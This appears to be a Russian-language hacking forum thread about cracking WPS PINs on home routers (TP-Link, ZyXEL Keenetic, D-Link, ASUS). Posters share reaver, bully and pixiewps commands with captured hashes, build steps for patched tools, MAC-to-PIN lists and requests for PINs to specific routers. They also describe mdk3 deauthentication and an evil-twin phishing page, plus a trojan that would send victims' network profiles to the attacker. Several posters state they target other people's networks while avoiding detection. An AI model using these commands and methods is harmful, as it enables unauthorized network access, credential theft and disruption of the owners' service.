Возможно в Backtrack старая версия mdk3. А возможно эта модель/прошивка не реагирует на mdk3. У меня был успешный опыт на wifislax версий 4.7 и 4.8. Еще может зависеть от драйвера для wi-fi адаптера. Какой он в BackTrack свежести надо смотреть. Кстати адаптер у меня alfa awus036h. От самого адаптера может и не зависит, а вот адаптер+драйвер уже больше вариаций.
А еще лог похож на слабую связь с точкой или на наличие помех.
С утра гляну,щас спать лег,поставил почты брутить))
Адаптер у меня Qualcomm Atheros AR9485WB-EG,сигнал сети 60-70 % это где то -65db
ну сегодня еще раз попробую,поверчу ноут))
сигнал сети 60-70 % это где то -65db
По факту, если сигнал -65db, то это 35%-40%, но ни как не 60-70%
binarymaster
23.01.2015, 14:10
Один пользователь с сайта поделился со мной данной ссылкой, раскрывающей алгоритм генерации WPA ключа для роутера P.DG-A4001N.
http://ednolo.alumnos.upv.es/?p=1883
Другие роутеры тоже могут содержать подобный алгоритм. Python скрипт прилагается в статье.
https://bitbucket.org/dudux/adbpirelli - здесь ещё несколько скриптов генерации от автора статьи.
00-22-B0-41-AF-67 = 45825798
EC-23-3D-DC-D7-0C = 44729721
00-0C-F6-5C-DA-08 = 60851284
90-F6-52-96-54-D6 = 85144590
F8-D1-11-5C-EF-C4 = 30047723
90-F6-52-AD-FA-59 = 14018176
84-A8-E4-DA-60-EA = 16495265
40-4A-03-76-DC-57 = 77896551
и снова про ТР-link, кто посоветует пин к маку F8-1A-67-79-42-26, лок после 8-9 пинов минимум на сутки,
mdk3 не берет, использую goyskript в wifislax 4.10, спасибо
Где-то в этой теме видел ссылку на прогу wps pin companion, но что то не могу ее найти. Ни у кого не осталось ссылки?
TOX1C ну такой и ещё же, в router scan, есть
GeneratorWPSPIN
Подскажите по этому роутеру, вроде asus
http://rghost.ru/7nK5Tfqyp
VladimirV
19.02.2015, 05:58
Подскажите по этому роутеру, вроде asus
http://rghost.ru/7nK5Tfqyp
ASUS RT-N53 Black
ASUS RT-G32 Rev.C1
Rastamanka
27.02.2015, 02:18
Подскажите получила странный WPA PSK... Его длина 64 символа содержащий буквы и цифры. И после брута имя точки в результате не тот что брутила..
F8CC6484A7434B45c877e43dd3c47ca77da068992F11D907EF 98ca0f5c7baaa1
Точка заглючила. Скорее всего теперь называется Network с чем-нибудь и скорее всего это Zyxel. Такое бывает при подборе пина или при подключении по пину. Теперь только ждать перезагрузки хозяином.
Rastamanka
27.02.2015, 04:18
Подскажите как в Ubuntu подключиться к точке зная тока PIN?
-=charon=-
27.02.2015, 11:40
Подскажите как в Ubuntu подключиться к точке зная тока PIN?
airmon-ng start wlan0 (или какой у тебя там wlan)
reaver -i mon0 -b мак точки -c канал точки -p пин -vv
или я неправильно понял вопрос?
Подскажите как в Ubuntu подключиться к точке зная тока PIN?
Вот тут было: http://forum.antichat.ru/showpost.php?p=3277235&postcount=306
Скорее, Rastamanka, надо законектиться с точкой по пину, типо как в винде, при помощи утилит QSS, Jumpstart и т.д.
binarymaster
27.02.2015, 20:23
Скорее, Rastamanka, надо законектиться с точкой по пину, типо как в винде, при помощи утилит QSS, Jumpstart и т.д.
Постом выше как раз это и объясняется, при помощи консольных команд.
Обнаружил две точки с началом в мак-адресе EC:43:F6 и названием Keenetic-dddd (d-цифры), у которых пароли kDLnTQ2h и aULnE3j6. Заинтересовало совпадение Ln. Посмотрите в своих результатах подобные точки, встречается ли Ln в паролях, а может еще какие-нибудь совпадения обнаружатся.
Добавлено: нашел еще один, но он далек от первых двух - GEYpKtrR, может у кого-то будет что-то похожее.
Обнаружил две точки с началом в мак-адресе EC:43:F6 и названием Keenetic-dddd (d-цифры), у которых пароли kDLnTQ2h и aULnE3j6. Заинтересовало совпадение Ln. Посмотрите в своих результатах подобные точки, встречается ли Ln в паролях, а может еще какие-нибудь совпадения обнаружатся.
У меня на аналогичном: Rs9nTvi7 . nT - как у вас в первом.
SEGA_1986
02.03.2015, 19:55
Подскажите пожалуйста, искал, чего-то нигде не могу найти.
Какую команду написать в ривере (minidwep) что-бы продолжить перебор с определённого пина?
elepol61
02.03.2015, 20:32
Подскажите пожалуйста, искал, чего-то нигде не могу найти.
Какую команду написать в ривере (FeedingBoottle) что-бы продолжить перебор с определённого пина?
а что в FeedingBoottle есть ривер?
SEGA_1986
03.03.2015, 01:43
а что в FeedingBoottle есть ривер?
СОРРИ! переклинило))) в minidwep-gtk
СОРРИ! переклинило))) в minidwep-gtk
Прописать нужный пин в файле соответствующей точки. Файл должен находиться в папке где ривер сохраняет результат. Вид файла: ХХХХХХХХХХХХ.wpc. Где ХХХХХХХХХХХХ мак адрес точки.
Или как вариант -p хххх когда известна первая половина пина, перебирает вторую.
-p хххххххх долбит конкретный пин.
Друзья, существует ли уже полная таблица или утилита для расковыривания ссидов? Желательно забугорная.
------------------------------
Да, я читал почти всю тему, но я заметил что иногда на просьбу подсказать пин людям отвечают числом, которое не выдают две тулзы, которые я тут скачал(companion и pin generator). По этому интересуюсь. Ну и еще не всегда понятно какие конкретно устройства(группы устройств) уязвимы.
прописываю в булли
bully -b мак точки -с1 -- mon0
что надо прописать чтобы булли показывал сколько % сделано
почему то долбит один и тот же пин
Vikhedgehog
14.03.2015, 21:39
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.
как кстати борешься с локами wps?
Роутеры huawei предоставляемые МГТС для подключения к ADSL можно взломать тем же способом, что и ZyXEL Keenetic. Проверено мною на сетях со SSID Wi-Fi-Router_XXXX, где XXXX - 4 цифры. Брутить хэндшейк не советую, пароль 8 знаков 0-9 A-Z.
Не подскажите mac этих хуавеев?
А может кто интереса ради подскажет рабочий пин к следующему ASUS'у:
D8:50:E60:5F:10
?
точка стоит совсем рядом, а брут по словарям её не берёт.
Vikhedgehog
14.03.2015, 23:09
Не подскажите mac этих хуавеев?
E8:CD:2D
как кстати борешься с локами wps?
Универсального способа нет. Если это зухель или хуавей для мгтс, то и бороться нечего, вычисляешь пин и сразу пароль получаешь. На TP-LINK можно попробовать DDoS, но этот баг уже вроде как исправили.
А может кто интереса ради подскажет рабочий пин к следующему ASUS'у:
D8:50:E60:5F:10
?
точка стоит совсем рядом, а брут по словарям её не берёт.
У асусов алгоритм wps никому еще сломать не удалось. Если по другому никак не получается, можно попробовать взломать сеть как это делуют в пиндостане, создав wifi с тем же SSID что и цель, а потом запустив DDoS на настоящую сеть. Пользователь попытается исправить проблемы с роутером, а если подключиться к вашей незашифрованной сети там уже можно стащить пароль либо попросив его при помощи http сервера с фишинговой страницей, либо отправив ему простой троян который скопирует все сетевые профили и отправит вам.
E8:CD:2D
Универсального способа нет. Если это зухель или хуавей для мгтс, то и бороться нечего, вычисляешь пин и сразу пароль получаешь. На TP-LINK можно попробовать DDoS, но этот баг уже вроде как исправили.
У асусов алгоритм wps никому еще сломать не удалось. Если по другому никак не получается, можно попробовать взломать сеть как это делуют в пиндостане, создав wifi с тем же SSID что и цель, а потом запустив DDoS на настоящую сеть. Пользователь попытается исправить проблемы с роутером, а если подключиться к вашей незашифрованной сети там уже можно стащить пароль либо попросив его при помощи http сервера с фишинговой страницей, либо отправив ему простой троян который скопирует все сетевые профили и отправит вам.
та фигня это всё(я про точку с таким же SSID),ну подключится,дальше что?как стащишь пароль,откуда??с помощью фишинговой да,можно,но страница должна быть как две капли воды,похожую на веб морду роутера ,ну и как такое замутить? ну допустим замутишь.....какого фига,человек пароль на такой странице вводить будет,если он видет,что точка открытая .Короче это всё на очень большого лоха расчитано,из 100 точек может на одной точке такая реализация получится,а так,дохлый номер.Я знаю по Linset,по приколу юзаю или левые к точки цепляются(открытая ж )либо клиент цепляется и отцепляется(понятное дело,фишинговая страница левая вообще,на веб морду роутера никак не похожая,я бы тоже не вводил бы пасс на такой странице ),или вообще часами прога работает,и никто вообще не подключается,при этом видно,что клиента от родной точки выбивает бесконечно(mdk3 в проге долбит).Короче это тоже не вариант(с фейковой точки)
Как раз таки эта тема прекрасно действует. С линсетом не работал, колхозил свой велосипед из подручных устройств. На мощной точке доступа типа ubiquiti поднималась сеть с таким же ссидом, настоящая точка пиндосилась с помощью мдк3. С помощью ap response или по ссиду можно угадать, какой железо юзается на той стороне, и подогнать точную копию страницы авторизации, немного переделав под наши задачи. От подключения левых устройств спасал фильтр по маку. На говно нетбуке вручную ставились настройки сети, и веб сервер для нубов, типа topserver. Так же была сделана проверка данных, юзер ввел не тот пароль, страница выбила ошибку. В большинстве своем юзеры подвох не заподозрили и быстро слили свой пасс к сети.
Но самое обидное было то, что пароли то словарные были. Ну максимум у одного кента был телефон с буквой в конце. Сбрутить то такие пассы легко, но вот даже прожженные хешкрякеры форума взять эти сети не могли.
Как раз таки эта тема прекрасно действует. С линсетом не работал, колхозил свой велосипед из подручных устройств. На мощной точке доступа типа ubiquiti поднималась сеть с таким же ссидом, настоящая точка пиндосилась с помощью мдк3. С помощью ap response или по ссиду можно угадать, какой железо юзается на той стороне, и подогнать точную копию страницы авторизации, немного переделав под наши задачи. От подключения левых устройств спасал фильтр по маку. На говно нетбуке вручную ставились настройки сети, и веб сервер для нубов, типа topserver. Так же была сделана проверка данных, юзер ввел не тот пароль, страница выбила ошибку. В большинстве своем юзеры подвох не заподозрили и быстро слили свой пасс к сети.
Но самое обидное было то, что пароли то словарные были. Ну максимум у одного кента был телефон с буквой в конце. Сбрутить то такие пассы легко, но вот даже прожженные хешкрякеры форума взять эти сети не могли.
та ну.....это уже заумно очень,умения нужны (подогнать точную копию страницы авторизации,и тд),Просто вот всё что ты описал,реализовано уже в Linset с одним только огромным минусом:там страница авторизации вообще тупо левая,ни как у роутеров,вообще левая.....т.е вообще лохом надо быть,что бы на такой странице пасс вбивать .А вообще удивительно,как у тебя юзеры подвох не замечали:точка то открытая,им в голову не приходило,что как так.....точка открытая,а пасс просит
Кстати какой командой пиндосил реальную точку(mdk3),а то там же комбинаций полно.Та и вообще,не все ж точки поддаются mdk3,некоторым до лампочки этот mdk3
всем привет. что-то немного не понимаю.. вотбщем суть вот:
http://i.gyazo.com/7c79d46a4dfcdf378b916bf24a386a11.png
http://i.gyazo.com/05c9ed6004bcfaa217a286c3027f4f20.png
http://i.gyazo.com/5bc26202b75a60a6f1e73624a5f2ffc1.png
тоесть на 1 точку Длинк подходят оба пина? и как бороться с ошибкой.. весь мозг сломал уже. пользовался генератором WPS местным
мак 1C:AF:F7:2A:01:56
сигнал -75. видимо этого недостаточно??..
спасибо
binarymaster
31.03.2015, 15:49
Да, должно хотя бы до сообщения M4 доходить, сигнал слабоват.
Ещё можете попробовать поставить флаг -T 0.5 для увеличения таймаута.
Новости с буржуйских хак-сайтов:
1. Какой-то новый вид атаки WPS Pixie Dust Attack
2. Ralink 2015 Usb Driver RT2770,2870,3070,307x,357x,etc.
(кому надо http://www.mediatek.com/en/downloads/ )
Новости с буржуйских хак-сайтов:
1. Какой-то новый вид атаки WPS Pixie Dust Attack
Вот уже и утилитку сделали...
https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool
а вот видео (на англ)
и список "вайфаев" , подходящих для взлома. точки доступа+роутеры на чипах ralink+broadcom
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y
получилось нормально так. Zyxel Keenetic вломался на 123. хоть там ПИН NIC-24 to PIN, но все равно для теста норм. вот лог
мак: C8:6C:87:3E:3B:3B
pixiewps -e 87:ed:e4:ff:43:5c:ec:af:22:c5:bb:15:10:75:bf:0b:6d :0b:3f:98:a0:2a:de:63:59:25:9a:22:86:c4:63:65:52:2 8:9a:97:9b:87:61:d6:e0:c1:d9:c4:d3:d4:01:95:2b:7a: fe:5a:e9:39:80:3c:09:aa:84:e7:77:37:d5:f1:84:75:b4 :3d:88:c0:ce:c0:a5:9b:be:88:4f:c5:03:ba:a1:2a:41:4 f:bb:0d:6f:fe:06:02:52:be:53:92:b3:cb:db:49:6f:10: e0:5b:9f:7e:05:1c:94:d9:86:66:45:b3:31:bb:45:30:64 :72:8c:6e:59:3b:b3:06:e5:bd:a1:71:10:af:cc:98:74:5 a:77:70:82:59:62:3d:12:06:b6:41:a0:d0:43:a7:8d:da: 85:e8:66:9a:a5:e0:f2:e5:91:00:23:66:5c:3c:cd:69:71 :c4:6a:de:2e:9a:34:8c:26:91:70:c2:b2:ba:0c:75:ec:0 5:dc:f2:49:79:02:60:10:5f -s 63:c0:ef:6b:2b:4c:ec:93:b8:41:5b:f6:9e:8f:6f:c2:97 :41:b1:ea:f4:41:b1:4d:66:2d:79:83:81:60:2e:66 -z ae:90:99:61:c4:ab:dd:80:a2:dc:62:8f:12:71:5a:ae:51 :37:56:c1:93:d7:be:8a:db:81:c5:fb:cc:dc:f1:ca -a e0:7a:7f:e8:52:d1:68:36:01:90:bf:58:03:08:67:f5:9b :4c:a6:40:2d:3c:66:da:f3:6d:ea:b5:58:f5:c3:f0 -S
кстати эти данные можете себе подставить и увидите пин и точку доступа и тд.
Грабитель
05.04.2015, 08:46
Помогите советом, замучался уже с точками доступа TP_Link, у них у всех стоит защита от перебора пин кода, а точки важные.
Вопрос вот какой, можно ли через reaver поставить задержку в переборе пин кода? Только чтобы это действительно работало с TP_LINK, и пин код подбирался бы медленно, но без палева взлома.
Буду признателен за команду которой можно сделать и главное какой наиболее оптимальный лимит для TPLINK лучше поставить.
Помогите советом, замучался уже с точками доступа TP_Link, у них у всех стоит защита от перебора пин кода, а точки важные.
Вопрос вот какой, можно ли через reaver поставить задержку в переборе пин кода? Только чтобы это действительно работало с TP_LINK, и пин код подбирался бы медленно, но без палева взлома.
Буду признателен за команду которой можно сделать и главное какой наиболее оптимальный лимит для TPLINK лучше поставить.
Боюсь огорчить, Tp-link уходит в lock после 10 пинов, который длиться обычно до перезагрузи ТД, так же в настройках может быть отключена авторизация по PIN, а оставлен только коннект по нажатию на кнопку.
Можете покурить тему поднятую выше , с вычислением pin через pixiewps. Но не факт что она на TP-link сработает.
Как добыть tbf-01.cap и tbf-01.csv, ведь хендшейки без tbf?
получилось нормально так. Zyxel Keenetic вломался на 123. хоть там ПИН NIC-24 to PIN, но все равно для теста норм. вот лог
мак: C8:6C:87:3E:3B:3B
pixiewps -e 87:ed:e4:ff:43:5c:ec:af:22:c5:bb:15:10:75:bf:0b:6d :0b:3f:98:a0:2a:de:63:59:25:9a:22:86:c4:63:65:52:2 8:9a:97:9b:87:61:d6:e0:c1:d9:c4:d3:d4:01:95:2b:7a: fe:5a:e9:39:80:3c:09:aa:84:e7:77:37:d5:f1:84:75:b4 :3d:88:c0:ce:c0:a5:9b:be:88:4f:c5:03:ba:a1:2a:41:4 f:bb:0d:6f:fe:06:02:52:be:53:92:b3:cb:db:49:6f:10: e0:5b:9f:7e:05:1c:94:d9:86:66:45:b3:31:bb:45:30:64 :72:8c:6e:59:3b:b3:06:e5:bd:a1:71:10:af:cc:98:74:5 a:77:70:82:59:62:3d:12:06:b6:41:a0:d0:43:a7:8d:da: 85:e8:66:9a:a5:e0:f2:e5:91:00:23:66:5c:3c:cd:69:71 :c4:6a:de:2e:9a:34:8c:26:91:70:c2:b2:ba:0c:75:ec:0 5:dc:f2:49:79:02:60:10:5f -s 63:c0:ef:6b:2b:4c:ec:93:b8:41:5b:f6:9e:8f:6f:c2:97 :41:b1:ea:f4:41:b1:4d:66:2d:79:83:81:60:2e:66 -z ae:90:99:61:c4:ab:dd:80:a2:dc:62:8f:12:71:5a:ae:51 :37:56:c1:93:d7:be:8a:db:81:c5:fb:cc:dc:f1:ca -a e0:7a:7f:e8:52:d1:68:36:01:90:bf:58:03:08:67:f5:9b :4c:a6:40:2d:3c:66:da:f3:6d:ea:b5:58:f5:c3:f0 -S<br/>
<br/>
<br/>
кстати эти данные можете себе подставить и увидите пин и точку доступа и тд.
Vikhedgehog
05.04.2015, 17:07
На ASUS RT-N66U (2012/2013) не работает. А TP-LINK'и вроде все на atheros построены. У кого нибудь на чем-то кроме кинетиков и древних линксисов пошло?
pin через pixiewps. Но не факт что она на TP-link сработает.
Все tp-link сделаны на atheros(AR), либо более новые на qualcomm-atheros(QCA). Поэтому pixiewps не сработает.
Вот тут описана еще одна mdk3 атака сразу с трех mon-интерфейсов на роутер cisco, которая якобы срабатывает и перезагружает его, и перебор пинов можно продолжить. Кто хочет - дерзайте, сам я пока не пробовал.
Vikhedgehog
05.04.2015, 18:31
Судя по всему, уязвимы DIR-300 B1. Самые старые A1 не уязвимы, поскольку они на Atheros.
Все tp-link сделаны на atheros(AR), либо более новые на qualcomm-atheros(QCA).
Не все есть еще модели которые работают на broadcom и ralink
Не все есть еще модели которые работают на broadcom и ralink
Например.
broadcom TD-8610, TD-8810, TD-8811, TD-8840, TD-W8910G, TD-W8920G, TD-W8950ND, TD-W8960N
Ralink TP-Link TD-W8901N, Tp-link TD-W8101G, TP-LINK TD-W8951ND v4
broadcom TD-8610, TD-8810, TD-8811, TD-8840, TD-W8910G, TD-W8920G, TD-W8950ND, TD-W8960N
Ralink TP-Link TD-W8901N, Tp-link TD-W8101G, TP-LINK TD-W8951ND v4
Кое-что действительно делают на ralink и bcm. Это все adsl?
Кое-что действительно делают на ralink и bcm. Это все adsl?
да
Onechester
06.04.2015, 01:32
приветствую, господа, а кто пользуется airslax, реально ли самому поставить в него утилиту для WPS Pixie Dust Attack
Как добыть tbf-01.cap и tbf-01.csv, ведь хендшейки без tbf?
где ты взял такое.. смотри видео. делай также. кстати еще 1 момент, у кого стоит Kali и выбрасывает такую ошибку :
checking for pcap_open_live in -
lpcap... no
error: pcap library not found!
нужно установить 2 файла
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
после чего уже по инструкции:
*******
*********
./configure
make
make install
Спасибо, всё сработало с учётом вашей поправки.
где ты взял такое.. смотри видео. делай также. кстати еще 1 момент, у кого стоит Kali и выбрасывает такую ошибку :
checking for pcap_open_live in -<br/>
lpcap... no<br/>
error: pcap library not found!
нужно установить 2 файла
sudo apt-get install libpcap-dev<br/>
sudo apt-get install libsqlite3-dev
после чего уже по инструкции:
*******
*********
./configure
make
make install
На Tp-Link pin not found. Попробовал на трёх.
Так всё таки,для каких точек эта прога подходит?У кого реально получалось пин добыть и на каких точках?
Vikhedgehog
06.04.2015, 17:03
Так всё таки,для каких точек эта прога подходит?У кого реально получалось пин добыть и на каких точках?
ZyXEL... пока особенно толку от этой проги не замечаю.
я же писал. вот гугл док, там собраны некоторые точки доступа. + ломаются быстро все на чипах ralink и многие broadcom.
просто вбиваете модель роутера в гугл и да прибудет с вами сила
https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y список
Что за фигня происходит......вот тестирую WPS Pixie Dust Attack,всё как в видео делаю,запускаю ривер,всё как на видео,а ривер начинает по обычному работать,т.е пины перебирать)))ну и в лок точка уходит(TP-LINK же))),смысл проги WPS Pixie Dust Attack тогда?я так из видео понял,что должна другая инфо показаться,хешы,что бы дальше команды задавать.....а инфы нет,просто ривер по обычному работает.....значит что то не правильно работает(((У Вас как,кто тестил прогу?как на видео?т.е ривер делает один перебор пина и дальше хешы показывает,или как?
Пипец,штук 15 точек перепробовал(именно TP-LINK пробовал),везде ривер начинает просто пины перебирать и всё,т.е как на видео не происходит(ну хешы,и другая информация)просто пины перебирает......странно,чего так,в чём проблема((
скрипт
Что за фигня происходит......вот тестирую WPS Pixie Dust Attack,всё как в видео делаю,запускаю ривер,всё как на видео,а ривер начинает по обычному работать,т.е пины перебирать)))ну и в лок точка уходит(TP-LINK же))),смысл проги WPS Pixie Dust Attack тогда?я так из видео понял,что должна другая инфо показаться,хешы,что бы дальше команды задавать.....а инфы нет,просто ривер по обычному работает.....значит что то не правильно работает(((У Вас как,кто тестил прогу?как на видео?т.е ривер делает один перебор пина и дальше хешы показывает,или как?
ты не правильно установил. смотри видео внимательно. ты ривер не пропатчил как надо. или у тебя скорее всего ошибка вылазила. глянь мои посты выше. есть фикс
пс: 95% ТП линков не ломаются... к сожалению..
ты не правильно установил. смотри видео внимательно. ты ривер не пропатчил как надо. или у тебя скорее всего ошибка вылазила. глянь мои посты выше. есть фикс
пс: 95% ТП линков не ломаются... к сожалению..
та всё сделал как на видео,пошагово прям.......при запуске ривера,ривер и начинает работать,т.е пины перебирать....а есть то вообще точки,которые в локе,т.е с ними вообще в проге работать не получится...Думаю большинству людей и нужно тп линки сломать)),а ты говоришь не ломаются....
та всё сделал как на видео,пошагово прям.......при запуске ривера,ривер и начинает работать,т.е пины перебирать....а есть то вообще точки,которые в локе,т.е с ними вообще в проге работать не получится...Думаю большинству людей и нужно тп линки сломать)),а ты говоришь не ломаются....
А может такое быть,что просто точки не на нужных чипах были,вот ривер попросту и пообычному работал)))?Как узнать,на каком передатчике та или иная точка работает?Забивал в гугле,ничего про тип и модель чипа не показывает,просто характеристики.Вот например нужен TP-LINK TL-WR 740N(A0:F3:C1:44:A7:4A),как узнать его начинку,подходит ли начинка для работы с прогой?А так всё правильно делал,как на видео:установил 2 файла сначала:sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Потом ривер,потом pixiewps,всё отлично запустилось,но когда запустил ривер,он просто тупо по обычному начал подбор пинов,и так ещё с десяток точек,тп линки выбирал именно...
А может такое быть,что просто точки не на нужных чипах были,вот ривер попросту и пообычному работал)))?Как узнать,на каком передатчике та или иная точка работает?Забивал в гугле,ничего про тип и модель чипа не показывает,просто характеристики.Вот например нужен TP-LINK TL-WR 740N(A0:F3:C1:44:A7:4A),как узнать его начинку,подходит ли начинка для работы с прогой?А так всё правильно делал,как на видео:установил 2 файла сначала:sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
Потом ривер,потом pixiewps,всё отлично запустилось,но когда запустил ривер,он просто тупо по обычному начал подбор пинов,и так ещё с десяток точек,тп линки выбирал именно...
добавь в команду запуска reaver значение -vv и будет тебе счастье.
пример: reaver -i mon0 -b aa:bb:cc:dd:ee - vv -S
добавь в команду запуска reaver значение -vv и будет тебе счастье.
пример: reaver -i mon0 -b aa:bb:cc:dd:ee - vv -S
так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...
Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).
Tp-Link, Dlink, Asus перепробовал и Pin not found. Если Reaver не остановить, то, правильно, он будет продолжать перебор. Просто надо проследить вначале перебора-если появились необходимые данные - ривер нодо остановить и далее по инструкции. Мне ничего из перечисленных роутеров взломать не удалось (Pin not found).
у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...
Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...
у меня не появляются необходимые данные,т.е у меня просто тупо ривер пины перебирает(1,2,3,4 пина и тд)Т.е вот как на видео,так у меня не происходит,после перебора первого же пина,данные о точке появится должны,а у меня просто ривер пин за пином перебирает....так что что то у меня не работает,хотя всё устанавливал по инструкции,никаких ошибок не выскакивало...
Та и вообще,я так понимаю,из 50 точек,хоть бы одна так открывалась)))судя по отзывам,неговоря,если на точке вообще wps залочен,а на TP-LINK как правило как залочилось,так до перезагрузки...
Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.
так я так и делал,говорю ж,всё как на видео сделал....но на видио,при запуске ривера он не перебирал как обычно,а сразу выдавал информацию о точке,прошивка,хешы какие то,а дальше подставлялись эти хеши и запускался pixiewps,а у меня просто ривер работает и всё,перебирает как обычно пины,а я то хочу запустить pixiewps...
Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.
Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.
Поддерживаю, у меня тоже такое было, когда плохо пропатчил.
Сначала необходимо подключиться к интернету и по очереди ввести sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev, как сказано в посте 2410, потом отключиться от интернета и далее по видео, внимательно проследить и вовремя остановить перебор. Удачи.
так так и делал,ну правда от инета не отключался...а так всё как по видео,т.е последовательно...
Значит ты не пропатчил как надо reaver, патченый он должен показывать версию reaver 1.5. Выложи скрин с работой reaver и комманду которой reaver запускаешь.
правильно,1.5 показывает,значит пропатчил.....ну выложу скрин,как запущу всё это...
Поддерживаю, у меня тоже такое было, когда плохо пропатчил.
тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))
Tp-Link, Dlink, Asus перепробовал и Pin not found.
Аналогично. На тех, что у нас более менее распространены уязвимость не работает. Кто какие модели роутеров взломал?
тогда подробно,пошагово напиши,как пропатчил,та и вообще как всё устанавливал,т.е сначала те 2 файла,потом ривер,потом pixiewps?Спасибо заранее))
1. скопіювати в папку HOME папки pixiewps-master і reaver-wps-fork-read-only
2. підключитися до інтернету і в терміналі по черзі запустити:
apt-get install libpcap-dev
apt-get install libsqlite3-dev
і від'єднатися від інтернету
3. chmod 755 (пробіл) з відкритої папки reaver-wps-fork-read-only - src перетягнути файлик - CONFIGURE
4. cd (пробіл) і перетягнути папку - SRC
5. ./configure
6. make
7. make install і закрити термінал
Новий термінал
8. cd (пробіл) і перетягнути папку SRC з папки pixiewps-master
9. make
10. make install і закрити термінал
новий термінал
11. iwconfig - airmon-ng start wlan0 - airodump-ng mon0
12. reaver -i mon0 -c ? -b xxxxxx -vv -S і зупинити, коли будуть всі дані
13. pixiewps -e PKE -s Hash1 -z Hash2 -a Auth Key -S
1.
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
cd reaver-wps-fork-read-only/src
chmod 775 configure
./configure
make
make install
2.
pixiewps-master/src
make
make install
" chmod 775 " я вводил это
1.
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
cd reaver-wps-fork-read-only/src
chmod 775 configure
./configure
make
make install
2.
pixiewps-master/src
make
make install
" chmod 775 " я вводил это
А это--sudo apt-get install libssl-dev-- откуда? В видео нет.
А это--sudo apt-get install libssl-dev-- откуда?
из видео в описании
Интересно, не нахожу, но учту, спасибо.
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.
Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.
Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.
так а какой должен быть мод reaver-ра по правильному,что бы работал правильно?
СЕРЖ32, у tp-link, которые на 60 сек, однозначно, wps отключен.(поэтому хоть минуту, час или перезагрузка роута ни чо не даёт)
reaver тот что по ссыле скачивания, а порядок его установки, более подробно, уже выше написали ((первый раз при запуске у меня тож перепор по порядку шёл)), я Kali, сейчас не пользую, поэтому пункты sudo apt-get install libssl-dev.....и т.д. не делаю.
Всё верно, дело в моде reaver-ра и от сюда зависет работает иль нет, tp-link, из 8-ми, только один сдался,причём у которых lock wps (блок на 60 сек)-антон, dlink-ки из 5-ти два, к стати если чуть обождать перебор дольше, то суммы другие даёт и вот с ними dlink дал пин, остальные Pin not found, ZyXEL Keenetic два штуки 2-3 секунды и отдал pin.
Кто поглубже знает Линь, подскажите, как вернуть назад режим мониторинга, после патча на reaver сменилось обозначение wifi, было wlan1, а стало wlan1mon (думаю что мод, драйвер меняет), так из-за этого режим мониторинга не влючается на bully и Inflator.
Когда запускаешь airmon-zc получается wlan1mon, когда airmon-ng mon0, у меня с airmon-zc нет -1 при фиксированном канале, но пропадает wlanx, до airmon-zc stop wlanx.
